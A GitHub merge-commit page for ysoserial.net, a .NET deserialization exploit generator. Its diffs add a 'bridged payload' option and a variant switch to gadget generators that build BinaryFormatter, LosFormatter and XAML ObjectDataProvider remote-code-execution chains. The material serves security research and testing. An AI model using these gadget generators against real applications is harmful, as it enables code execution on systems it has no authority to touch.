Skip to content

Commit

Permalink
Merge pull request #140 from irsdl/master
Browse files Browse the repository at this point in the history 
adding a feature & general updates
  • Loading branch information
@irsdl
irsdl authored Nov 17, 2022
2 parents abfbfe7 + f359691 commit 78b366e
Show file tree
Hide file tree
Showing 18 changed files with 466 additions and 75 deletions.
55 changes: 49 additions & 6 deletions README.md
View file

Large diffs are not rendered by default.

30 changes: 25 additions & 5 deletions ysoserial/Generators/ActivitySurrogateDisableTypeCheck.cs
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
using System.Collections.Generic;
using NDesk.Options;
using System.Collections.Generic;
using ysoserial.Helpers;

namespace ysoserial.Generators
Expand All @@ -22,14 +23,26 @@ public override string Finders()

public override List<string> Labels()
{
return new List<string> { GadgetTypes.BridgeAndDerived };
return new List<string> { GadgetTypes.NotBridgeButDervied };
}

public override List<string> SupportedFormatters()
{
return new List<string> { "BinaryFormatter", "SoapFormatter", "NetDataContractSerializer", "LosFormatter" };
}

int variant_number = 1;

public override OptionSet Options()
{
OptionSet options = new OptionSet()
{
{"var|variant=", "Choices: 1 -> use TypeConfuseDelegateGenerator [default], 2 -> use TextFormattingRunPropertiesMarshal", v => int.TryParse(v, out variant_number) },
};

return options;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
string xaml_payload = @"<ResourceDictionary
Expand Down Expand Up @@ -62,12 +75,19 @@ public override object Generate(string formatter, InputArgs inputArgs)
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>";

object payload = TypeConfuseDelegateGenerator.GetXamlGadget(xaml_payload);

if (inputArgs.Minify)
{

xaml_payload = XmlMinifier.Minify(xaml_payload, null, null);
}

object payload;
if (variant_number == 1)
{
payload = TypeConfuseDelegateGenerator.GetXamlGadget(xaml_payload);
}
else
{
payload = new TextFormattingRunPropertiesMarshal(xaml_payload);
}

Expand Down
17 changes: 15 additions & 2 deletions ysoserial/Generators/AxHostStateGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -34,11 +34,24 @@ public override List<string> SupportedFormatters()
return new List<string> { "BinaryFormatter", "SoapFormatter", "LosFormatter", "NetDataContractSerializer"};
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); // we could have used AxHostStateGeneratorGadget directly here but it wouldn't have passed our other potential filters using the user input
}

IGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); // we could have used AxHostStateGeneratorGadget directly here but it wouldn't have passed our other potential filters using the user input
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

AxHostStateMarshal payloadAxHostMarshal = new AxHostStateMarshal(Convert.FromBase64String(b64encoded));
Expand Down
20 changes: 17 additions & 3 deletions ysoserial/Generators/ClaimsIdentityGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -29,12 +29,26 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived, "OnDeserialized" };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
}

var b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
Expand Down
20 changes: 17 additions & 3 deletions ysoserial/Generators/ClaimsPrincipalGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -30,13 +30,27 @@ public override string Finders()

public override List<string> Labels()
{
return new List<string> { GadgetTypes.BridgeAndDerived, "OnDeserialized" };
return new List<string> { GadgetTypes.BridgeAndDerived, "OnDeserialized" , "SecondOrderDeserialization"};
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] rceGadget = (byte[])(new TypeConfuseDelegateGenerator()).GenerateWithNoTest("BinaryFormatter", inputArgs);
string b64encoded = Convert.ToBase64String(rceGadget);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[]) BridgedPayload;
}
else
{
binaryFormatterPayload = (byte[]) (new TypeConfuseDelegateGenerator()).GenerateWithNoTest("BinaryFormatter", inputArgs);
}

string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
Expand Down
18 changes: 15 additions & 3 deletions ysoserial/Generators/DataSetGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -34,12 +34,24 @@ public override List<string> SupportedFormatters()
return new List<string> { "BinaryFormatter", "SoapFormatter", "LosFormatter"};
}

public override object Generate(string formatter, InputArgs inputArgs)
public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

byte[] init_payload = (byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
binaryFormatterPayload = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
}

DataSetMarshal payloadDataSetMarshal = new DataSetMarshal(init_payload);
DataSetMarshal payloadDataSetMarshal = new DataSetMarshal(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
Expand Down
25 changes: 22 additions & 3 deletions ysoserial/Generators/DataSetTypeSpoofGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -20,11 +20,30 @@ public override string Contributors()
return "Soroush Dalili, Markus Wulftange, Jang";
}

public override string AdditionalInfo()
{
return "A more advanced type spoofing which can use any arbtirary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson";
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] init_payload =
(byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(init_payload);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
binaryFormatterPayload = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
}


DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(binaryFormatterPayload);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
Expand Down
8 changes: 8 additions & 0 deletions ysoserial/Generators/GenericGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -20,6 +20,13 @@ public abstract class GenericGenerator : IGenerator
public abstract string Finders();
public abstract string Name();
public abstract List<string> SupportedFormatters();

// This is used when we want a gadget to support incoming from another gadget
public virtual string SupportedBridgedFormatter()
{
return Formatters.None;
}
public object BridgedPayload { get; set ;}

public virtual string AdditionalInfo()
{
Expand Down Expand Up @@ -275,5 +282,6 @@ public object Serialize(object payloadObj, string formatter, InputArgs inputArgs
}
}


}
}
25 changes: 23 additions & 2 deletions ysoserial/Generators/IGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,8 @@ public interface IGenerator
string Contributors();
List<string> Labels();
List<string> SupportedFormatters();
string SupportedBridgedFormatter();
object BridgedPayload { get; set; }
object Generate(string formatter, InputArgs inputArgs);
object GenerateWithInit(string formatter, InputArgs inputArgs);
object GenerateWithNoTest(string formatter, InputArgs inputArgs);
Expand All @@ -29,10 +31,29 @@ public interface IGenerator
public static class GadgetTypes
{
public const string
NotBridgeNotDerived = "Not bridge or derived",
NotBridgeNotDerived = "Not bridge or derived",
NotBridgeButDervied = "Not bridge but derived", // Bridge has dervied meaning in it too
BridgeAndDerived = "Bridge and dervied",
Dummy = "It relies on other gadgets and is not a real gadget on its own (not bridged or derived either)", // We hide these in normal help as they are only valuable for research purposes - example is ResourceSet
None="";
None = "";
}

public static class Formatters
{
public const string
BinaryFormatter = "BinaryFormatter",
LosFormatter = "LosFormatter",
SoapFormatter = "SoapFormatter",
NetDataContractSerializer = "NetDataContractSerializer",
DataContractSerializer = "DataContractSerializer",
FastJson = "FastJson",
FsPickler = "FsPickler",
JavaScriptSerializer = "JavaScriptSerializer",
JsonNet = "Json.Net",
SharpSerializerBinary = "SharpSerializerBinary",
Xaml = "Xaml",
XmlSerializer = "XmlSerializer",
YamlDotNet = "YamlDotNet",
None = "";
}
}
18 changes: 16 additions & 2 deletions ysoserial/Generators/RolePrincipalGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -27,10 +27,24 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
}

string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

var payloadClaimsPrincipalMarshal = new RolePrincipalMarshal(b64encoded);
Expand Down
18 changes: 16 additions & 2 deletions ysoserial/Generators/SessionSecurityTokenGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -38,6 +38,11 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

private string GetB64SessionToken(string b64encoded)
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
Expand All @@ -49,8 +54,17 @@ private string GetB64SessionToken(string b64encoded)

public override object Generate(string formatter, InputArgs inputArgs)
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
}

string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
Expand Down
19 changes: 17 additions & 2 deletions ysoserial/Generators/SessionViewStateHistoryItemGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -30,6 +30,11 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived };
}

public override string SupportedBridgedFormatter()
{
return Formatters.LosFormatter;
}

private string GetB64SessionToken(string b64encoded)
{
var obj = new SessionViewStateHistoryItemMarshal(b64encoded);
Expand All @@ -41,8 +46,18 @@ private string GetB64SessionToken(string b64encoded)

public override object Generate(string formatter, InputArgs inputArgs)
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
string losFormatterText = Encoding.UTF8.GetString((byte[])generator.GenerateWithNoTest("LosFormatter", inputArgs));
byte[] losFormatterPayload;
if (BridgedPayload != null)
{
losFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
losFormatterPayload = (byte[])generator.GenerateWithNoTest("LosFormatter", inputArgs);
}

string losFormatterText = Encoding.UTF8.GetString(losFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
Expand Down
21 changes: 18 additions & 3 deletions ysoserial/Generators/ToolboxItemContainerGenerator.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -31,15 +31,30 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] gadget = (byte[]) SerializeWithNoTest(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs), "binaryformatter", inputArgs);
string b64encoded = Convert.ToBase64String(gadget);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])SerializeWithNoTest(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs), "binaryformatter", inputArgs);
}

string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new ToolboxItemContainerMarshal(gadget);
var obj = new ToolboxItemContainerMarshal(binaryFormatterPayload);
return Serialize(obj, formatter, inputArgs);
}
else if (formatter.ToLower().Equals("soapformatter"))
Expand Down
Loading

0 comments on commit 78b366e

Please sign in to comment.